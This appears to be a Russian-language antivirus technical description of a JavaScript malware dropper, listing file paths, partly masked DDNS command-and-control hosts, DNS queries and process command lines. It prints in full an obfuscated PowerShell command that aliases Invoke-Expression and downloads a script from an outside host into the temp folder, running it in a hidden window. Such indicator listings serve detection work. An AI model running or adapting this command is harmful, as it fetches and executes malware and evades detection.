Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\skt.js
- %TEMP%\skt.js
- 'pr###1.ddns.net':7974
- http://pr####.ddns.net:7974/Vre
- DNS ASK re######pr.sslblindado.com
- DNS ASK pr###1.ddns.net
- '<SYSTEM32>\wscript.exe' "%TEMP%\skt.js"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://redefilepr.sslblindado.com/amizade'',$env:TEMP+''\\''+''skt.js'')'|D; star...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://redefilepr.sslblindado.com/amizade'',$env:TEMP+''\\''+''skt.js'')'|D; star...